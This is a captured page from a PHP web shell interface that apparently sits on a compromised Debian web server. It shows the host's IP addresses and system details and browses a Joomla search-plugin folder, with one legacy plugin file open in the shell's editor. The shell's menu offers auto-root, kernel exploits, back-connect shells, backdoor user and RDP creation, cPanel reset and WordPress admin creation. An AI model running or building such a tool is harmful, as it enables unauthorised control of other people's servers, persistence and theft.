Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.188.245.152
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dialektologia /
web /
mambots /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
categories.searchbot.php
3.54
KB
-rw-r--r--
categories.searchbot.xml
821
B
-rw-r--r--
contacts.searchbot.php
3.25
KB
-rw-r--r--
contacts.searchbot.xml
811
B
-rw-r--r--
content.searchbot.php
7.92
KB
-rw-r--r--
content.searchbot.xml
1.01
KB
-rw-r--r--
newsfeeds.searchbot.php
3.43
KB
-rw-r--r--
newsfeeds.searchbot.xml
804
B
-rw-r--r--
sections.searchbot.php
3.27
KB
-rw-r--r--
sections.searchbot.xml
820
B
-rw-r--r--
weblinks.searchbot.php
3.58
KB
-rw-r--r--
weblinks.searchbot.xml
811
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contacts.searchbot.php
<?php /** * @version $Id: contacts.searchbot.php 5057 2006-09-14 16:38:01Z friesengeist $ * @package Joomla * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // no direct access defined( '_VALID_MOS' ) or die( 'Restricted access' ); $_MAMBOTS->registerFunction( 'onSearch', 'botSearchContacts' ); /** * Contacts Search method * * The sql must return the following fields that are used in a common display * routine: href, title, section, created, text, browsernav * @param string Target search string * @param string mathcing option, exact|any|all * @param string ordering option, newest|oldest|popular|alpha|category */ function botSearchContacts( $text, $phrase='', $ordering='' ) { global $database, $my, $_MAMBOTS; // check if param query has previously been processed if ( !isset($_MAMBOTS->_search_mambot_params['contacts']) ) { // load mambot params info $query = "SELECT params" . "\n FROM #__mambots" . "\n WHERE element = 'contacts.searchbot'" . "\n AND folder = 'search'" ; $database->setQuery( $query ); $database->loadObject($mambot); // save query to class variable $_MAMBOTS->_search_mambot_params['contacts'] = $mambot; } // pull query data from class variable $mambot = $_MAMBOTS->_search_mambot_params['contacts']; $botParams = new mosParameters( $mambot->params ); $limit = $botParams->def( 'search_limit', 50 ); $text = trim( $text ); if ($text == '') { return array(); } $section = _CONTACT_TITLE; switch ( $ordering ) { case 'alpha': $order = 'a.name ASC'; break; case 'category': $order = 'b.title ASC, a.name ASC'; break; case 'popular': case 'newest': case 'oldest': default: $order = 'a.name DESC'; break; } $query = "SELECT a.name AS title," . "\n CONCAT_WS( ', ', a.name, a.con_position, a.misc ) AS text," . "\n '' AS created," . "\n CONCAT_WS( ' / ', " . $database->Quote( $section ) . ", b.title ) AS section," . "\n '2' AS browsernav," . "\n CONCAT( 'index.php?option=com_contact&task=view&contact_id=', a.id ) AS href" . "\n FROM #__contact_details AS a" . "\n INNER JOIN #__categories AS b ON b.id = a.catid" . "\n WHERE ( a.name LIKE '%$text%'" . "\n OR a.misc LIKE '%$text%'" . "\n OR a.con_position LIKE '%$text%'" . "\n OR a.address LIKE '%$text%'" . "\n OR a.suburb LIKE '%$text%'" . "\n OR a.state LIKE '%$text%'" . "\n OR a.country LIKE '%$text%'" . "\n OR a.postcode LIKE '%$text%'" . "\n OR a.telephone LIKE '%$text%'" . "\n OR a.fax LIKE '%$text%' )" . "\n AND a.published = 1" . "\n AND b.published = 1" . "\n AND a.access <= " . (int) $my->gid . "\n AND b.access <= " . (int) $my->gid . "\n GROUP BY a.id" . "\n ORDER BY $order" ; $database->setQuery( $query, 0, $limit ); $rows = $database->loadObjectList(); return $rows; } ?>
Close